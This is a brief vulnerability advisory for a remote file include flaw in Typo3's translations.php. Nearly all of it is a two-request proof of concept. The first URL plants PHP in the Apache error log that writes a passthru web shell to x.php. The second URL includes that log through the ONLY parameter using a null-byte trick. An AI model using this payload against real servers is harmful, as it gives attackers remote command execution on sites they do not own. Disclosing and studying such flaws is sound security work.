Typo3 Translations.PHP Remote File Include Vulnerability

Typo3 Translations.PHP Remote File Include Vulnerability

The following proof of concept was provided:

http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00'